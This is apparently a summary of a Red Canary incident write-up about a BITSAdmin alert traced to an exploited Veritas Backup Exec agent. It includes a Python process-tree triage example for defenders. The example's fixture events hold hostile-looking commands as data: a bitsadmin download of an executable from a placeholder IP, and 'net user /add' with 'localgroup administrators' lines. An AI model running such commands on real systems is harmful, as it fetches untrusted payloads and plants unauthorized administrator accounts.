Red Canary Gives Insights into How a BITSAdmin Alert Can Initiate an Investigation
Insights into the detection of a potential threat involving the BITSAdmin tool are outlined in a blog post by Red Canary's Detection Engineer, Han Shan, and Threat Specialist, Laura Brosnan. The incident began with an alert triggered by BITSAdmin downloading a file, which raised concern for three reasons: irregular admin activity, a source IP address registered in Russia, and an attempt to save a one-character HTML file as an executable. While the downloaded executable "did not seem to successfully execute after being downloaded," tracing the parent process revealed further signs of suspicious activity: BITSAdmin had been launched by CMD, and the CMD command line included the creation of several Admin accounts. Interestingly, Han observed that the newly created administrator accounts had "passwords associated with large Russian business entities and interests."
Further up the process tree, CMD turned out to have been invoked by a Veritas Backup Exec process, beremote.exe, suggesting that the backup software itself had been exploited to gain execution. Red Canary promptly engaged the customer, and a Mandiant report linked the activity to a known ransomware operator exploiting Veritas CVEs. Through swift collaboration, Red Canary and the customer eradicated the threat within two hours, underscoring the critical role of timely detection and response.
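The triage described above, a BITSAdmin download flagged for its source and destination and then traced to a CMD parent that creates admin accounts and a beremote.exe grandparent, can be expressed as process-tree logic. The following is an added example and not Red Canary's detection code; it runs over constructed, Sysmon-style process-creation events, and the IP address, URL, account name, password and beremote.exe install path in it are placeholders and assumptions.

```python
"""Triage a BITSAdmin download alert by walking the process tree. Added example, not
Red Canary's code; constructed Sysmon-style events with placeholder IP/URL/account/path."""
import ipaddress
import os
import re
from collections import namedtuple
from urllib.parse import urlparse

ProcEvent = namedtuple("ProcEvent", "pid ppid image cmdline")  # one process-creation event

# Constructed sample telemetry (not from the incident); ppid 1 is an untracked root.
EVENTS = [
    # Assumed Backup Exec Remote Agent path; a real install may differ.
    ProcEvent(100, 1, r"C:\Program Files\Veritas\Backup Exec\RAWS\beremote.exe", "beremote.exe"),
    ProcEvent(200, 100, r"C:\Windows\System32\cmd.exe",
              "cmd.exe /c net user svc_backup P@ssw0rd-Example! /add "
              "&& net localgroup administrators svc_backup /add"),
    ProcEvent(300, 200, r"C:\Windows\System32\bitsadmin.exe",
              r"bitsadmin.exe /transfer job /download /priority foreground "
              r"http://203.0.113.7/a.html C:\Windows\Temp\a.exe"),
    # Benign-looking contrast: hostname source, matching extension, ordinary ancestry.
    ProcEvent(400, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(500, 400, r"C:\Windows\System32\bitsadmin.exe",
              r"bitsadmin.exe /transfer update /download "
              r"https://example.com/update.msi C:\Users\Admin\Downloads\update.msi"),
]

URL_RE = re.compile(r"https?://\S+", re.I)
# net.exe / net1.exe account creation and local Administrators group additions.
NET_USER_ADD = re.compile(r"\bnet1?(?:\.exe)?\s+user\s+(\S+)(?:\s+\S+)?\s+/add\b", re.I)
NET_LOCALGROUP_ADMIN = re.compile(r"\bnet1?(?:\.exe)?\s+localgroup\s+administrators\s+(\S+)\s+/add\b", re.I)
EXEC_EXTS = {".exe", ".dll", ".scr", ".bat", ".cmd", ".ps1", ".msi"}

def basename(path):
    # Lower-cased file name of a Windows path, portable to non-Windows hosts.
    return os.path.basename(path.replace("\\", "/")).lower()

def bits_transfer(ev):
    """(source_url, destination) for a bitsadmin /transfer or /addfile, else None.
    Whitespace tokenising suffices here; quoted paths with spaces need a real tokenizer."""
    if basename(ev.image) != "bitsadmin.exe":
        return None
    tokens = ev.cmdline.split()
    if not {"/transfer", "/addfile"} & {t.lower() for t in tokens}:
        return None
    url = next((t for t in tokens if URL_RE.fullmatch(t)), None)
    return (url, tokens[-1]) if url else None

def flag_download(url, dest):
    """Flags on the transfer itself: bare-IP source; non-executable content saved as executable."""
    flags, parsed = [], urlparse(url)
    try:
        ipaddress.ip_address(parsed.hostname or "")
        flags.append("source-is-bare-ip")
    except ValueError:
        pass
    src_ext = os.path.splitext(parsed.path)[1].lower()
    dst_ext = os.path.splitext(dest.replace("\\", "/"))[1].lower()
    if dst_ext in EXEC_EXTS and src_ext != dst_ext:
        flags.append(f"extension-mismatch:{src_ext or '(none)'}->{dst_ext}")
    return flags

def ancestors(ev, by_pid):
    """Parent, grandparent, ... until the chain leaves the dataset or loops."""
    chain, seen, cur = [], {ev.pid}, by_pid.get(ev.ppid)
    while cur is not None and cur.pid not in seen:
        chain.append(cur)
        seen.add(cur.pid)
        cur = by_pid.get(cur.ppid)
    return chain

def flag_ancestors(chain):
    """Lineage flags: account creation in a shell ancestor, Backup Exec agent above it."""
    flags = []
    for depth, anc in enumerate(chain, start=1):
        name = basename(anc.image)
        if name in ("cmd.exe", "powershell.exe"):
            flags += [f"ancestor{depth}-creates-user:{m.group(1)}" for m in NET_USER_ADD.finditer(anc.cmdline)]
            flags += [f"ancestor{depth}-adds-local-admin:{m.group(1)}" for m in NET_LOCALGROUP_ADMIN.finditer(anc.cmdline)]
        if name == "beremote.exe":
            flags.append(f"ancestor{depth}-veritas-backup-exec-agent")
    return flags

def investigate(events):
    """One triage record per BITSAdmin download: transfer, lineage, flags, verdict."""
    by_pid = {e.pid: e for e in events}
    results = []
    for ev in events:
        transfer = bits_transfer(ev)
        if transfer is None:
            continue
        url, dest = transfer
        chain = ancestors(ev, by_pid)
        flags = flag_download(url, dest) + flag_ancestors(chain)
        results.append({"pid": ev.pid, "url": url, "dest": dest, "flags": flags,
                        "chain": [basename(a.image) for a in chain],
                        "verdict": "escalate" if flags else "review"})
    return results

if __name__ == "__main__":
    print(*investigate(EVENTS), sep="\n")
```

The lineage walk is what turns an ambiguous file download into a high-priority alert: a shell parent running `net user ... /add` and a backup-agent grandparent that has no business spawning a shell change the verdict, while the second, hostname-sourced download with an ordinary parent produces no flags. The one-character HTML body the blog post relied on is not visible in process telemetry; that check would come from file-create or network events rather than the process record.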
Red Canary's intervention thwarted additional malicious activity; supplementary OSINT reports pointed to the possible installation of AnyDesk as a follow-on step in the compromise. Notably, the adversary's reuse of a single fixed password for both the Admin account created through CMD and AnyDesk corroborated the attacker's tactics, techniques, and procedures (TTPs). This detection spotlight underscores the importance of not only detecting and scrutinizing abnormal activity but also leveraging external intelligence for a fuller understanding of the threat. The coordination between Red Canary's detection engineers and threat hunters, combined with proactive customer communication, played a pivotal role in swiftly limiting the attack's impact and hardening the organization against future threats.